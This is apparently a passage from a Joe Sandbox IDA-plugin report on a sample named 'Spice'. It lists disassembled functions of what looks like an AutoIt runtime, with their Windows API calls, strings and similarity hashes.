SetActiveWindow.USER32 ref: 00ED55C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00ED55D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 00ED55F3
Sleep.KERNEL32(000000FA), ref: 00ED55FE
IsWindow.USER32 ref: 00ED560A
EndDialog.USER32(00000000), ref: 00ED561B

Strings

BUTTON, xrefs: 00ED5599

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: db4afad86419c619b55e99c5be4189e041a82e69ba6024cbca35d530f779928f
Instruction ID: def274291ecbbaf77671b7022abcd82e3ae81df022cc5156212b0c924b00c939
Opcode Fuzzy Hash: db4afad86419c619b55e99c5be4189e041a82e69ba6024cbca35d530f779928f
Instruction Fuzzy Hash: 6421C97110470CAFEB915B60ED89F363F6BFB443A5F48242AF40191261CF758D52BB62

Uniqueness

Uniqueness Score: -1.00%

Function 00EDDBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

CoInitialize.OLE32(00000000), ref: 00EDDC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EDDCC0
SHGetDesktopFolder.SHELL32(?), ref: 00EDDCD4
CoCreateInstance.OLE32(00F03D4C,00000000,00000001,00F2B86C,?), ref: 00EDDD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EDDD8F
CoTaskMemFree.OLE32(?,?), ref: 00EDDDE7
_memset.LIBCMT ref: 00EDDE24
SHBrowseForFolderW.SHELL32(?), ref: 00EDDE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EDDE83
CoTaskMemFree.OLE32(00000000), ref: 00EDDE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EDDEC1
CoUninitialize.OLE32(00000001,00000000), ref: 00EDDEC3

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 560be7c3b942fab6f698622c9cd8fe7cc5ef4343301dfd2615fec0bb2548d8e5
Instruction ID: 4675d5198835b3b0e6048360c1a095df055be5b444506d53852b35aebecc3c5a
Opcode Fuzzy Hash: 560be7c3b942fab6f698622c9cd8fe7cc5ef4343301dfd2615fec0bb2548d8e5
Instruction Fuzzy Hash: D9B1C775A00109AFDB14DFA4C889EAEBBF9FF48304F149459E909EB351DB30AD46DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00ED0896
SetKeyboardState.USER32(?), ref: 00ED0901
GetAsyncKeyState.USER32(000000A0), ref: 00ED0921
GetKeyState.USER32(000000A0), ref: 00ED0938
GetAsyncKeyState.USER32(000000A1), ref: 00ED0967
GetKeyState.USER32(000000A1), ref: 00ED0978
GetAsyncKeyState.USER32(00000011), ref: 00ED09A4
GetKeyState.USER32(00000011), ref: 00ED09B2
GetAsyncKeyState.USER32(00000012), ref: 00ED09DB
GetKeyState.USER32(00000012), ref: 00ED09E9
GetAsyncKeyState.USER32(0000005B), ref: 00ED0A12
GetKeyState.USER32(0000005B), ref: 00ED0A20

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d7e7825520198510d2a1d2980785d01fc0f8e6c6ce4a2be76ba73d296761920e
Instruction ID: 0c2d5803217b4a988ad805ff22d779ecfc7f35a38fc01ece76dead78e03e0437
Opcode Fuzzy Hash: d7e7825520198510d2a1d2980785d01fc0f8e6c6ce4a2be76ba73d296761920e
Instruction Fuzzy Hash: 3951C734A0478829FB35DBB088157AABFF4DF41384F4C559B85C26B3C3DA649A4DCBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ECCE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00ECCE1C
GetWindowRect.USER32(00000000,?), ref: 00ECCE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00ECCE8C
GetDlgItem.USER32(?,00000002), ref: 00ECCE97
GetWindowRect.USER32(00000000,?), ref: 00ECCEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00ECCEFD
GetDlgItem.USER32(?,000003E9), ref: 00ECCF0B
GetWindowRect.USER32(00000000,?), ref: 00ECCF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00ECCF5F
GetDlgItem.USER32(?,000003EA), ref: 00ECCF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00ECCF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 00ECCF97

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 50f96f8c172231a8b6d520d042262d52ad32614487ce267cda4105c6c3054219
Instruction ID: 2d672b2ac3e34a8e0e928803657fee1d23c80e3ae68f7ea0c18baae6627e4cd6
Opcode Fuzzy Hash: 50f96f8c172231a8b6d520d042262d52ad32614487ce267cda4105c6c3054219
Instruction Fuzzy Hash: 58512171B00209AFDB14CF69CD95FADBBB6FB88711F14812DF519E7290DB7199018B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E723F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00E71F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72412,?,00000000,?,?,?,?,00E71AA7,00000000,?), ref: 00E71F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E724AF
KillTimer.USER32(-00000001,?,?,?,?,00E71AA7,00000000,?,?,00E71EBE,?,?), ref: 00E7254A
DestroyAcceleratorTable.USER32(00000000), ref: 00EABFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E71AA7,00000000,?,?,00E71EBE,?,?), ref: 00EAC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E71AA7,00000000,?,?,00E71EBE,?,?), ref: 00EAC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E71AA7,00000000,?,?,00E71EBE,?,?), ref: 00EAC04B
DeleteObject.GDI32(00000000), ref: 00EAC05D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1708efb43119dfac94e3911b69a81f7143f8f41b62cdacc8fb9abe57262451cf
Instruction ID: d1384aa179f41dc2f0cb49c4f3710bd8a84a229649c889f9e1bd73afa9efd6b1
Opcode Fuzzy Hash: 1708efb43119dfac94e3911b69a81f7143f8f41b62cdacc8fb9abe57262451cf
Instruction Fuzzy Hash: A6618C31104708DFDB35AF14C948B2A77F2FB4532AF24E51DE55A6AA60C771B880EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E72581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00E729AB: GetWindowLongW.USER32(?,000000EB), ref: 00E729BC

GetSysColor.USER32(0000000F), ref: 00E725AF

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 2786091c72e433f7ba8fc5898cc82a1f7f396b0b8f1022f28e67d0381b7593dd
Instruction ID: 3dbb7f25d8be2bb42ee2fcaed481fbc4495668ddc55e302f07daff9bd6c8059d
Opcode Fuzzy Hash: 2786091c72e433f7ba8fc5898cc82a1f7f396b0b8f1022f28e67d0381b7593dd
Instruction Fuzzy Hash: 6941E830004504AFDB205F68DC88BB93765FB0A335F18926AFE69AE1E5CB308C41EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E829BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00E90B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E82A3E,?,00008000), ref: 00E90BA7

Part of subcall function 00E90284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E82A58,?,00008000), ref: 00E902A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E82ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00E82C2C

Part of subcall function 00E83EBE: _wcscpy.LIBCMT ref: 00E83EF6

Part of subcall function 00E9386D: _iswctype.LIBCMT ref: 00E93875

Strings

Error opening the file, xrefs: 00EBFD33, 00EBFDAA
EA06, xrefs: 00EBFD48
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00EBFD17
Bad directive syntax error, xrefs: 00EC008F
AU3!, xrefs: 00E82A93
Unterminated string, xrefs: 00EC00D6

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: 5942433bb78195bd2f83d9a73f895f15a2236fa3ac719d8ac52877d9d8436ec4
Instruction ID: a00986b2ac0942f8989c71901f6e4faa444644e6b29cc8dc455acadfcf3fffa8
Opcode Fuzzy Hash: 5942433bb78195bd2f83d9a73f895f15a2236fa3ac719d8ac52877d9d8436ec4
Instruction Fuzzy Hash: 0E02BE701083419FC724EF24C851AAFBBE5EF99354F10192DF59EA32A2DB31DA49DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00EDAEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00F00980), ref: 00EDAF4E
GetDriveTypeW.KERNEL32(00000061,00F2B5F0,00000061), ref: 00EDB018
_wcscpy.LIBCMT ref: 00EDB042

Strings

unknown, xrefs: 00EDAFD9
removable, xrefs: 00EDAF80
cdrom, xrefs: 00EDAF6A
network, xrefs: 00EDAFAC
fixed, xrefs: 00EDAF96
ramdisk, xrefs: 00EDAFC2
all, xrefs: 00EDAF54

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: de9b73368d8ba7639493e8758a6980970e7f9dcc0102af50c0b53aed5d8caadd
Instruction ID: 06f7be1a07d24d0b0908dd81ca74a91b5d7d7631c0f5a103bcef7b4838debbfd
Opcode Fuzzy Hash: de9b73368d8ba7639493e8758a6980970e7f9dcc0102af50c0b53aed5d8caadd
Instruction Fuzzy Hash: CD51C370204305DFC714EF14D891AAAB7E5EF94704F54686EF4996B2E2EB31DD0ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 00E74D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00E74D62
__swprintf.LIBCMT ref: 00E74DAC
__i64tow.LIBCMT ref: 00EADB3B

Strings

%.15g, xrefs: 00E74DA6
True, xrefs: 00EADAFC
False, xrefs: 00EADB03
0x%p, xrefs: 00EADB1D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 7cb318b8bfe6d9dd1af05874a360295fe71ce5fc9cb4ac2bf1c9991200e8845b
Instruction ID: ba333690a1e9f49aeff5e6690d37c2b36dbacddf1613dfd093640c2069f0b877
Opcode Fuzzy Hash: 7cb318b8bfe6d9dd1af05874a360295fe71ce5fc9cb4ac2bf1c9991200e8845b
Instruction Fuzzy Hash: 0D41A571608209AFDB34EF74DC41E7973E8EB49304F20545EE68EFB292EA31A9429711

Uniqueness

Uniqueness Score: -1.00%

Function 00EF7777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF778F
CreateMenu.USER32 ref: 00EF77AA
SetMenu.USER32(?,00000000), ref: 00EF77B9
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF7846
IsMenu.USER32(?), ref: 00EF785C
CreatePopupMenu.USER32 ref: 00EF7866
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF7893
DrawMenuBar.USER32 ref: 00EF789B

Strings

F, xrefs: 00EF7887
0, xrefs: 00EF7785

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: daa2f2b87c07fffaea54686a02ec17b25755c17164b2e366bc68647e1e5706a1
Instruction ID: 6cca985fe3cc37dd9fbed970c2483afa314a77c171b52db8718c64ecad17daa8
Opcode Fuzzy Hash: daa2f2b87c07fffaea54686a02ec17b25755c17164b2e366bc68647e1e5706a1
Instruction Fuzzy Hash: 88415974A04219EFEB24DF64D888BAABBF5FF48350F184029FA85A7360D730A910DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EF7AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EF7B83
CreateCompatibleDC.GDI32(00000000), ref: 00EF7B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EF7B9D
SelectObject.GDI32(00000000,00000000), ref: 00EF7BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00EF7BB0
DeleteDC.GDI32(00000000), ref: 00EF7BB9
GetWindowLongW.USER32(?,000000EC), ref: 00EF7BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EF7BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EF7BE3

Strings

static, xrefs: 00EF7B1B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: dd61b886bec04d33e87523c6096375360ed78770fedcc89d2702bd5c20501037
Instruction ID: daeec0c239cad29d42a18902cf7e15e8c2169b83d3a68887e59c9726607898e0
Opcode Fuzzy Hash: dd61b886bec04d33e87523c6096375360ed78770fedcc89d2702bd5c20501037
Instruction Fuzzy Hash: 68318B3210421DABDF119F64DC49FEB3B6AFF0A364F115214FA59A21A0CB31D820EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E97030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9706B

Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58

__gmtime64_s.LIBCMT ref: 00E97104
__gmtime64_s.LIBCMT ref: 00E9713A
__gmtime64_s.LIBCMT ref: 00E97157
__allrem.LIBCMT ref: 00E971AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E971C9
__allrem.LIBCMT ref: 00E971E0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E971FE
__allrem.LIBCMT ref: 00E97215
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E97233
__invoke_watson.LIBCMT ref: 00E972A4

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction ID: 2b5a613f271708bda81a9a5ae397dc059c533098342ed001bc261b194c2bd57a
Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: 347137B1A24707ABDB149F79CC41BAEB3E8AF45324F14522AF554F7281E770EE488790

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED2CE9
GetMenuItemInfoW.USER32(00F37890,000000FF,00000000,00000030), ref: 00ED2D4A
SetMenuItemInfoW.USER32(00F37890,00000004,00000000,00000030), ref: 00ED2D80
Sleep.KERNEL32(000001F4), ref: 00ED2D92
GetMenuItemCount.USER32(?), ref: 00ED2DD6
GetMenuItemID.USER32(?,00000000), ref: 00ED2DF2
GetMenuItemID.USER32(?,-00000001), ref: 00ED2E1C
GetMenuItemID.USER32(?,?), ref: 00ED2E61
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ED2EA7
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2EBB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2EDC

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: bb504faad8e811c7dbc71356afc0d6185b823165444fda7eb234c78d7e6e70c3
Instruction ID: 79c5df1beb2c3d3eab01a850eb12e21eab304edfd1e5107547bc9c24fdd47366
Opcode Fuzzy Hash: bb504faad8e811c7dbc71356afc0d6185b823165444fda7eb234c78d7e6e70c3
Instruction Fuzzy Hash: 2C616EB0900249AFDB22DF64CD84ABEBBB9EB51308F14545EF941B7351DB31AD06DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00EF7548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EF75CA
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EF75CD
GetWindowLongW.USER32(?,000000F0), ref: 00EF75F1
_memset.LIBCMT ref: 00EF7602
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF7614
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EF768C

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: f46362f1f7551f11b32f37f9f1bd34433b88ed1e32fb3fff521bbdabb928c4a1
Instruction ID: b62c5236bea51b02103a6a288e4534120d019eb8a663df7e0737d9b828cc6ceb
Opcode Fuzzy Hash: f46362f1f7551f11b32f37f9f1bd34433b88ed1e32fb3fff521bbdabb928c4a1
Instruction Fuzzy Hash: A9617A75904208AFDB20DFA8CC85EFE77F8EB09714F10019AFA55A72A1D770AD41DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC77B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EC77DD
SafeArrayAllocData.OLEAUT32(?), ref: 00EC7836
VariantInit.OLEAUT32(?), ref: 00EC7848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00EC7868
VariantCopy.OLEAUT32(?,?), ref: 00EC78BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00EC78CF
VariantClear.OLEAUT32(?), ref: 00EC78E4
